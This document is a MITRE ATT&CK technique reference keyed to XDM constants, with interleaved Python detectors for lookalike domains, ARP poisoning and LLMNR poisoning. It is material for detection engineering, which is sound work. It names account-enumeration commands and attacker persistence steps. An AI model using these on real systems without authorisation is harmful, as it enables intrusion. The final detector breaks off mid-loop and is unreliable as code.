T1134.005 XDM_CONST.MITRE_TECHNIQUE_ACCESS_TOKEN_MANIPULATION_SID_HISTORY_INJECTION Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens). With Domain Administrator (or equivalent) rights, harvested or well-known SID values (Citation: Microsoft Well Known SIDs Jun 2017) may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as [Remote Services](https://attack.mitre.org/techniques/T1021), [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002), or [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006). https://attack.mitre.org/techniques/T1134/005
T1134.001 XDM_CONST.MITRE_TECHNIQUE_ACCESS_TOKEN_MANIPULATION_TOKEN_IMPERSONATION_OR_THEFT Adversaries may duplicate then impersonate another user's token to escalate privileges and bypass access controls. An adversary can create a new access token that duplicates an existing token using DuplicateToken(Ex). The token can then be used with ImpersonateLoggedOnUser to allow the calling thread to impersonate a logged on user's security context, or with SetThreadToken to assign the impersonated token to a thread. An adversary may do this when they have a specific, existing process they want to assign the new token to. For example, this may be useful for when the target user has a non-network logon session on the system. https://attack.mitre.org/techniques/T1134/001
T1531 XDM_CONST.MITRE_TECHNIQUE_ACCOUNT_ACCESS_REMOVAL Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. Adversaries may also subsequently log off and/or reboot boxes to set malicious changes into place. (Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019) https://attack.mitre.org/techniques/T1531
T1087 XDM_CONST.MITRE_TECHNIQUE_ACCOUNT_DISCOVERY Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior. https://attack.mitre.org/techniques/T1087
T1087.004 XDM_CONST.MITRE_TECHNIQUE_ACCOUNT_DISCOVERY_CLOUD_ACCOUNT Adversaries may attempt to get a listing of cloud accounts. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. With authenticated access there are several tools that can be used to find accounts. The Get-MsolRoleMember PowerShell cmdlet can be used to obtain account names given a role or permissions group in Office 365. (Citation: Microsoft msolrolemember)(Citation: GitHub Raindance) The Azure CLI (AZ CLI) also provides an interface to obtain user accounts with authenticated access to a domain. The command az ad user list will list all users within a domain. (Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018) The AWS command aws iam list-users may be used to obtain a list of users in the current account while aws iam list-roles can obtain IAM roles that have a specified path prefix. (Citation: AWS List Roles)(Citation: AWS List Users) In GCP, gcloud iam service-accounts list and gcloud projects get-iam-policy may be used to obtain a listing of service accounts and users in a project. (Citation: Google Cloud - IAM Service Accounts List API) https://attack.mitre.org/techniques/T1087/004
T1087.002 XDM_CONST.MITRE_TECHNIQUE_ACCOUNT_DISCOVERY_DOMAIN_ACCOUNT Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior. Commands such as net user /domain and net group /domain of the [Net](https://attack.mitre.org/software/S0039) utility, dscacheutil -q group on macOS, and ldapsearch on Linux can list domain users and groups. https://attack.mitre.org/techniques/T1087/002
T1087.003 XDM_CONST.MITRE_TECHNIQUE_ACCOUNT_DISCOVERY_EMAIL_ACCOUNT Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs). (Citation: Microsoft Exchange Address Lists) In on-premises Exchange and Exchange Online, the Get-GlobalAddressList PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session. (Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016) In Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization. (Citation: Google Workspace Global Access List) https://attack.mitre.org/techniques/T1087/003
T1087.001 XDM_CONST.MITRE_TECHNIQUE_ACCOUNT_DISCOVERY_LOCAL_ACCOUNT Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior. Commands such as net user and net localgroup of the [Net](https://attack.mitre.org/software/S0039) utility and id and groups on macOS and Linux can list local users and groups. On Linux, local users can also be enumerated through the use of the /etc/passwd file. On macOS the dscl . list /Users command can be used to enumerate local accounts. https://attack.mitre.org/techniques/T1087/001
T1098 XDM_CONST.MITRE_TECHNIQUE_ACCOUNT_MANIPULATION Adversaries may manipulate accounts to maintain access to victim systems. Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain. https://attack.mitre.org/techniques/T1098
T1098.003 XDM_CONST.MITRE_TECHNIQUE_ACCOUNT_MANIPULATION_ADD_OFFICE_365_GLOBAL_ADMINISTRATOR_ROLE An adversary may add the Global Administrator role to an adversary-controlled account to maintain persistent access to an Office 365 tenant. (Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: Microsoft O365 Admin Roles) With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins) via the global admin role. (Citation: Microsoft O365 Admin Roles) This account modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136) or other malicious account activity. https://attack.mitre.org/techniques/T1098/003
T1098.001 XDM_CONST.MITRE_TECHNIQUE_ACCOUNT_MANIPULATION_ADDITIONAL_CLOUD_CREDENTIALS Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment. Adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD. (Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords. (Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules. (Citation: Demystifying Azure AD Service Principals) In infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the CreateKeyPair or ImportKeyPair API in AWS or the gcloud compute os-login ssh-keys add command in GCP. (Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts. (Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes) https://attack.mitre.org/techniques/T1098/001
T1098.002 XDM_CONST.MITRE_TECHNIQUE_ACCOUNT_MANIPULATION_EXCHANGE_EMAIL_DELEGATE_PERMISSIONS Adversaries may grant additional permission levels, such as ReadPermission or FullAccess, to maintain persistent access to an adversary-controlled email account. The Add-MailboxPermission [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox. (Citation: Microsoft - Add-MailboxPermission)(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018) Adversaries may also assign mailbox folder permissions through individual folder permissions or roles. Adversaries may assign the Default or Anonymous user permissions or roles to the Top of Information Store (root), Inbox, or other mailbox folders. By assigning one or both user permissions to a folder, the adversary can utilize any other account in the tenant to maintain persistence to the target user's mail folders. (Citation: Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452) This may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can assign more access rights to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)), so the messages evade spam/phishing detection mechanisms. (Citation: Bienstock, D. - Defending O365 - 2019) https://attack.mitre.org/techniques/T1098/002
T1098.004 XDM_CONST.MITRE_TECHNIQUE_ACCOUNT_MANIPULATION_SSH_AUTHORIZED_KEYS Adversaries may modify the SSH authorized_keys file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <user-home>/.ssh/authorized_keys. (Citation: SSH Authorized Keys) Users may edit the system's SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value "yes" to ensure public key and RSA authentication are enabled. The SSH config file is usually located under /etc/ssh/sshd_config. Adversaries may modify SSH authorized_keys files directly with scripts or shell commands to add their own adversary-supplied public keys. This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH. (Citation: Venafi SSH Key Abuse)(Citation: Cybereason Linux Exim Worm) https://attack.mitre.org/techniques/T1098/004
T1583 XDM_CONST.MITRE_TECHNIQUE_ACQUIRE_INFRASTRUCTURE Adversaries may buy, lease, or rent infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services. (Citation: TrendmicroHideoutsLease) Additionally, botnets are available for rent or purchase. Use of these infrastructure solutions allows an adversary to stage, launch, and execute an operation. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contact to third-party web services. Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down. https://attack.mitre.org/techniques/T1583
T1583.005 XDM_CONST.MITRE_TECHNIQUE_ACQUIRE_INFRASTRUCTURE_BOTNET Adversaries may buy, lease, or rent a network of compromised systems that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks. (Citation: Norton Botnet) Adversaries may purchase a subscription to use an existing botnet from a booter/stresser service. With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS). (Citation: Imperva DDoS for Hire)(Citation: Krebs-Anna)(Citation: Krebs-Bazaar)(Citation: Krebs-Booter) https://attack.mitre.org/techniques/T1583/005
T1583.002 XDM_CONST.MITRE_TECHNIQUE_ACQUIRE_INFRASTRUCTURE_DNS_SERVER Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations. By running their own DNS servers, adversaries can have more control over how they administer server-side DNS C2 traffic ([DNS](https://attack.mitre.org/techniques/T1071/004)). With control over a DNS server, adversaries can configure DNS applications to provide conditional responses to malware and, generally, have more flexibility in the structure of the DNS-based C2 channel. (Citation: Unit42 DNS Mar 2019) https://attack.mitre.org/techniques/T1583/002
T1583.001 XDM_CONST.MITRE_TECHNIQUE_ACQUIRE_INFRASTRUCTURE_DOMAINS Adversaries may purchase domains that can be used during targeting. Domain names are the human
readable names used to represent one or more IP addresses. They can be purchased or, in some cases,
acquired for free. Adversaries can use purchased domains for a variety of purposes, including for [Phishing]
(https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/
T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that
are similar to legitimate domains, including through use of homoglyphs or use of a different top-level
domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in
delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries can
also use internationalized domain names (IDNs) to create visually similar lookalike domains for use in
operations.(Citation: CISA IDN ST05-016) Domain registrars each maintain a publicly viewable database
that displays contact information for every registered domain. Private WHOIS services display alternative
information, such as their own company data, rather than the owner of the domain. Adversaries may use
such private WHOIS services to obscure information about who owns a purchased domain. Adversaries
may further interrupt efforts to track their infrastructure by using varied registration information and
purchasing domains with different domain registrars.(Citation: Mandiant APT1) https://attack.mitre.org/
techniques/T1583/001
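The homoglyph, IDN and TLD-swap tricks described above are exactly what a lookalike-domain check has to undo before it can compare a candidate against a brand list. The Python below is an added example (not part of the XSIAM schema or of MITRE's text): it decodes punycode back to Unicode, collapses a small, hand-picked table of confusable glyphs to their Latin skeleton, and then reports whether a domain is a homoglyph, a TLD swap or a one-edit typosquat of a protected brand. The brand list, the confusable table and the two-label registered-domain rule are illustrative assumptions.

```python
"""Classify a candidate domain as a homoglyph, TLD-swap or typosquat of a brand.

Added example, not part of the XSIAM schema or of MITRE's text. The confusable
table is a small hand-picked subset (an assumption); production code should
load the full Unicode TR39 confusables list and a Public Suffix List.
"""
import unicodedata

# Multi-character confusables are collapsed first, then single characters.
MULTI_CONFUSABLES = {"rn": "m", "vv": "w"}
CONFUSABLES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",  # Cyrillic
    "\u0443": "y", "\u0445": "x", "\u0456": "i", "\u0455": "s", "\u0458": "j",
    "\u03b1": "a", "\u03bf": "o", "\u03bd": "v",                                 # Greek
    "0": "o", "1": "l",                                                         # digits
}


def skeleton(label):
    """Reduce a label to the Latin string it visually resembles."""
    s = unicodedata.normalize("NFKC", label).lower()
    for seq, rep in MULTI_CONFUSABLES.items():
        s = s.replace(seq, rep)
    return "".join(CONFUSABLES.get(ch, ch) for ch in s)


def to_unicode(domain):
    """Decode xn-- (punycode) labels so the skeleton sees the real glyphs."""
    try:
        return domain.encode("ascii").decode("idna")
    except UnicodeError:
        return domain  # already Unicode or malformed punycode: compare as-is


def levenshtein(a, b):
    """Edit distance, used to catch single-character typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_lookalike(domain, brands, max_distance=1):
    """brands maps a brand label to the set of TLDs it legitimately uses.

    Returns (brand, reason) with reason in {"homoglyph", "tld_swap",
    "typosquat"}, or None when the domain is genuine or unrelated.
    """
    labels = to_unicode(domain.rstrip(".").lower()).split(".")
    if len(labels) < 2:
        return None
    label, tld = labels[-2], labels[-1]  # assumption: two-label registered domain
    skel = skeleton(label)
    for brand, tlds in brands.items():
        brand_skel = skeleton(brand)
        if label == brand:
            return None if tld in tlds else (brand, "tld_swap")
        if skel == brand_skel:
            return (brand, "homoglyph")
        if levenshtein(skel, brand_skel) <= max_distance:
            return (brand, "typosquat")
    return None


if __name__ == "__main__":
    brands = {"paypal": {"com"}, "microsoft": {"com"}}
    for d in ["paypal.com", "p\u0430ypal.com".encode("idna").decode("ascii"),
              "paypal.net", "paypall.com", "rnicrosoft.com", "example.org"]:
        print(d, "->", classify_lookalike(d, brands))
```

The skeleton step is what makes the Cyrillic "а" in "pаypal" collide with the Latin brand; without the punycode decode the comparison would see only "xn--pypal-..." and miss it. Digit mappings ("1" to "l", "0" to "o") are deliberately aggressive, so feed this a list of brands, not arbitrary dictionary words, or the false-positive rate climbs.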
T1583.004 XDM_CONST.MITRE_TECHNIQUE_ACQUIRE_INFRASTRUCTURE_SERVER Adversaries may buy, lease, or rent physical servers that can be used during targeting. Use of servers
allows an adversary to stage, launch, and execute an operation. During post-compromise activity,
adversaries may utilize servers for various tasks, including for Command and Control. Instead of
compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual
Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run
their own servers in support of operations. Adversaries may only need a lightweight setup if most of their
activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if
they want to test, communicate, and control other aspects of their activities on their own systems.(Citation:
NYTStuxnet) https://attack.mitre.org/techniques/T1583/004
T1583.003 XDM_CONST.MITRE_TECHNIQUE_ACQUIRE_INFRASTRUCTURE_VIRTUAL_PRIVATE_SERVER Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety
of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS,
adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure
can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.
Acquiring a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow
adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers.
Adversaries may also acquire infrastructure from VPS service providers that are known for renting VPSs
with minimal registration information, allowing for more anonymous acquisitions of infrastructure.(Citation:
TrendmicroHideoutsLease) https://attack.mitre.org/techniques/T1583/003
T1583.006 XDM_CONST.MITRE_TECHNIQUE_ACQUIRE_INFRASTRUCTURE_WEB_SERVICES Adversaries may register for web services that can be used during targeting. A variety of popular websites
exist for adversaries to register for a web-based service that can be abused during later stages of the
adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/
techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567). Using
common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in
expected noise. By utilizing a web service, adversaries can make it difficult to physically tie back operations
to them. https://attack.mitre.org/techniques/T1583/006
T1595 XDM_CONST.MITRE_TECHNIQUE_ACTIVE_SCANNING Adversaries may execute active reconnaissance scans to gather information that can be used during
targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as
opposed to other forms of reconnaissance that do not involve direct interaction. Adversaries may perform
different forms of active scanning depending on what information they seek to gather. These scans can also
be performed in various ways, including using native features of network protocols such as ICMP.(Citation:
Botnet Scan)(Citation: OWASP Fingerprinting) Information from these scans may reveal opportunities for
other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/
T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing
operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain
Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote
Services](https://attack.mitre.org/techniques/T1133) or [Exploit Public-Facing Application](https://
attack.mitre.org/techniques/T1190)). https://attack.mitre.org/techniques/T1595
T1595.001 XDM_CONST.MITRE_TECHNIQUE_ACTIVE_SCANNING_SCANNING_IP_BLOCKS Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP
addresses may be allocated to organizations by block, or a range of sequential addresses. Adversaries
may scan IP blocks in order to [Gather Victim Network Information](https://attack.mitre.org/techniques/
T1590), such as which IP addresses are actively in use as well as more detailed information about hosts
assigned these addresses. Scans may range from simple pings (ICMP requests and responses) to more
nuanced scans that may reveal host software/versions via server banners or other network artifacts.
(Citation: Botnet Scan) Information from these scans may reveal opportunities for other forms of
reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or
[Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational
resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities]
(https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://
attack.mitre.org/techniques/T1133)). https://attack.mitre.org/techniques/T1595/001
T1595.002 XDM_CONST.MITRE_TECHNIQUE_ACTIVE_SCANNING_VULNERABILITY_SCANNING Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans
typically check if the configuration of a target host/application (ex: software and version) potentially aligns
with the target of a specific exploit the adversary may seek to use. These scans may also include more
broad attempts to [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592) that can be
used to identify more commonly known, exploitable vulnerabilities. Vulnerability scans typically harvest
running software and version numbers via server banners, listening ports, or other network artifacts.
(Citation: OWASP Vuln Scanning) Information from these scans may reveal opportunities for other forms of
reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or
[Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational
resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities]
(https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application]
(https://attack.mitre.org/techniques/T1190)). https://attack.mitre.org/techniques/T1595/002
T1557 XDM_CONST.MITRE_TECHNIQUE_ADVERSARY_IN_THE_MIDDLE Adversaries may attempt to position themselves between two or more networked devices using an
adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://
attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/
T1565/002). By abusing features of common networking protocols that can determine the flow of network
traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary
controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM
Basics) Adversaries may leverage the AiTM position to attempt to modify traffic, such as in [Transmitted
Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can also stop traffic from
flowing to the appropriate destination, causing denial of service. https://attack.mitre.org/techniques/T1557
T1557.002 XDM_CONST.MITRE_TECHNIQUE_ADVERSARY_IN_THE_MIDDLE_ARP_CACHE_POISONING Adversaries may poison Address Resolution Protocol (ARP) caches to position themselves between the
communication of two or more networked devices. This activity may be used to enable follow-on behaviors
such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation]
(https://attack.mitre.org/techniques/T1565/002). The ARP protocol is used to resolve IPv4 addresses to link
layer addresses, such as a media access control (MAC) address.(Citation: RFC826 ARP) Devices in a local
network segment communicate with each other by using link layer addresses. If a networked device does
not have the link layer address of a particular networked device, it may send out a broadcast ARP request
to the local network to translate the IP address to a MAC address. The device with the associated IP
address directly replies with its MAC address. The networked device that made the ARP request will then
use as well as store that information in its ARP cache. An adversary may passively wait for an ARP request
to poison the ARP cache of the requesting device. The adversary may reply with their MAC address, thus
deceiving the victim by making them believe that they are communicating with the intended networked
device. For the adversary to poison the ARP cache, their reply must be faster than the one made by the
legitimate IP address owner. Adversaries may also send a gratuitous ARP reply that maliciously announces
the ownership of a particular IP address to all the devices in the local network segment. The ARP protocol
is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC
address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance
Cleaver) Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity
may be used to collect and/or relay data such as credentials, especially those sent over an insecure,
unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003) https://attack.mitre.org/techniques/
T1557/002
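The mechanics above (a reply nobody asked for, a stateless cache that accepts it, and one MAC ending up as the "owner" of many IPs) map directly onto three things a passive monitor can count. The Python below is an added example with a constructed ARP event shape; it is not code from this page, from a real sensor or from the XDM schema. It flags an IP announced by two different MACs inside a time window, replies that answer no recorded request, and a single MAC answering for more IPs than a host should have.

```python
"""Flag ARP cache poisoning from passively observed ARP traffic.

Added example with a constructed event shape; it is not sensor output or
part of the XDM schema. Map your own ARP capture fields into ArpEvent.
"""
from collections import defaultdict
from dataclasses import dataclass

ARP_REQUEST, ARP_REPLY = 1, 2  # opcodes from RFC 826


@dataclass(frozen=True)
class ArpEvent:
    ts: float
    opcode: int
    sender_ip: str
    sender_mac: str
    target_ip: str
    target_mac: str  # all-zero or broadcast in requests


def detect_arp_poisoning(events, window=60.0, max_ips_per_mac=3):
    """Return findings for three indicators:

    ip_mac_conflict      one IP announced by two MACs inside `window` seconds
    unsolicited_reply    a reply sent to a host that made no matching request
                         (legitimate gratuitous ARP trips this too, so treat it
                         as corroboration for a conflict, not as an alert)
    mac_claims_many_ips  one MAC answering for more than `max_ips_per_mac` IPs
    """
    findings = []
    claims = defaultdict(dict)   # ip -> {mac: last_seen_ts}
    pending = defaultdict(dict)  # requester_ip -> {asked_ip: ts}
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.opcode == ARP_REQUEST:
            pending[ev.sender_ip][ev.target_ip] = ev.ts
            continue
        if ev.opcode != ARP_REPLY:
            continue
        asked_at = pending[ev.target_ip].pop(ev.sender_ip, None)
        announcement = ev.sender_ip == ev.target_ip  # normal gratuitous ARP shape
        if not announcement and (asked_at is None or ev.ts - asked_at > window):
            findings.append({"type": "unsolicited_reply", "ip": ev.sender_ip,
                             "mac": ev.sender_mac, "victim": ev.target_ip, "ts": ev.ts})
        recent = claims[ev.sender_ip]
        rivals = [m for m, t in recent.items()
                  if m != ev.sender_mac and ev.ts - t <= window]
        if rivals:
            findings.append({"type": "ip_mac_conflict", "ip": ev.sender_ip,
                             "macs": sorted(rivals + [ev.sender_mac]), "ts": ev.ts})
        recent[ev.sender_mac] = ev.ts
    ips_by_mac = defaultdict(set)
    for ip, macs in claims.items():
        for mac in macs:
            ips_by_mac[mac].add(ip)
    for mac, ips in ips_by_mac.items():
        if len(ips) > max_ips_per_mac:
            findings.append({"type": "mac_claims_many_ips", "mac": mac, "ips": sorted(ips)})
    return findings


def sample_events():
    """Constructed capture: one honest gateway reply, then a forged reply for
    the gateway's IP, then the same MAC claiming three more hosts."""
    gw, gw_mac = "10.0.0.1", "aa:bb:cc:00:00:01"
    victim, victim_mac = "10.0.0.20", "aa:bb:cc:00:00:20"
    evil_mac, zero = "de:ad:be:ef:00:01", "00:00:00:00:00:00"
    evs = [
        ArpEvent(1.0, ARP_REQUEST, victim, victim_mac, gw, zero),
        ArpEvent(1.1, ARP_REPLY, gw, gw_mac, victim, victim_mac),    # legitimate answer
        ArpEvent(1.3, ARP_REPLY, gw, evil_mac, victim, victim_mac),  # "10.0.0.1 is at evil"
    ]
    for host in ("10.0.0.2", "10.0.0.3", "10.0.0.4"):
        evs.append(ArpEvent(2.0, ARP_REPLY, host, evil_mac, victim, victim_mac))
    return evs


if __name__ == "__main__":
    for f in detect_arp_poisoning(sample_events()):
        print(f)
```

The ip_mac_conflict finding is the one worth paging on; a gateway failover or a DHCP lease change also produces it, so correlate against your asset inventory before acting. The unsolicited_reply count alone is noisy because hosts legitimately send gratuitous ARP at boot and on address changes.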
T1557.001 XDM_CONST.MITRE_TECHNIQUE_ADVERSARY_IN_THE_MIDDLE_LLMNR_NBT_NS_POISONING_AND_SMB_RELAY By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name
resolution to force communication with an adversary controlled system. This activity may be used to collect
or relay authentication materials. Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name
Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host
identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same
local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their
NetBIOS name. (Citation: Wikipedia LLMNR) (Citation: TechNet NetBIOS) Adversaries can spoof an
authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS
(UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that
the victims will communicate with the adversary controlled system. If the requested host belongs to a
resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the
adversary controlled system. The adversary can then collect the hash information sent over the wire
through tools that monitor the ports for traffic or through [Network Sniffing](https://attack.mitre.org/
techniques/T1040) and crack the hashes offline through [Brute Force](https://attack.mitre.org/techniques/
T1110) to obtain the plaintext passwords. In some cases where an adversary has access to a system that is
in the authentication path between systems or when automated scans that use credentials attempt to
authenticate to an adversary controlled system, the NTLMv2 hashes can be intercepted and relayed to
access and execute code against a target system. The relay step can happen in conjunction with poisoning
but may also be independent of it. (Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB
Relay) Several tools exist that can be used to poison name services within local networks such as
NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174). (Citation: GitHub
NBNSpoof) (Citation: Rapid7 LLMNR Spoofer) (Citation: GitHub Responder) https://attack.mitre.org/
techniques/T1557/001
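A host that legitimately answers LLMNR or NBT-NS answers for its own name and nothing else; a poisoner in the Responder mould answers for every name it hears, including names that do not exist anywhere. That asymmetry, plus the follow-on connection in which the victim hands over its NTLMv2 response, is what the added Python example below looks for. The event shape is constructed for illustration and is not a real sensor format or part of the XDM schema; the canary name, port list and thresholds are assumptions to tune per site.

```python
"""Spot LLMNR/NBT-NS poisoning from name-resolution and connection events.

Added example; the event shape is constructed for illustration, not a real
sensor format or the XDM schema. Map your own fields into NetEvent first.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class NetEvent:
    ts: float
    kind: str          # "query" | "response" | "conn"
    src_ip: str
    dst_ip: str = ""
    proto: str = ""    # "LLMNR" (UDP 5355) or "NBT-NS" (UDP 137) for query/response
    name: str = ""     # name asked for / answered
    dst_port: int = 0  # for "conn" events, e.g. 445 for SMB


# Services a spoofed victim would authenticate to (assumption; tune per site).
AUTH_PORTS = {445, 139, 80, 443}


def find_poisoners(events, canary_names=frozenset(), min_names=5, window=30.0):
    """Three indicators:

    canary_answered       someone answered a decoy name that exists nowhere
    promiscuous_responder one IP answered >= min_names distinct names
    auth_to_spoofed_host  a victim connected to the responder on an auth port
                          within `window` seconds of being answered (the point
                          at which the NTLMv2 hash is sent or relayed)
    Query events are accepted for realism but not needed by the logic.
    """
    names_by_responder = defaultdict(set)
    canary_hits = defaultdict(set)
    answers = []  # (ts, victim, responder, name)
    findings = []
    canary_names = {c.lower() for c in canary_names}
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.kind == "response" and ev.proto in ("LLMNR", "NBT-NS"):
            name = ev.name.lower()
            names_by_responder[ev.src_ip].add(name)
            if name in canary_names:
                canary_hits[ev.src_ip].add(name)
            answers.append((ev.ts, ev.dst_ip, ev.src_ip, name))
        elif ev.kind == "conn" and ev.dst_port in AUTH_PORTS:
            for ts, victim, responder, name in answers:
                if (victim, responder) == (ev.src_ip, ev.dst_ip) and 0 <= ev.ts - ts <= window:
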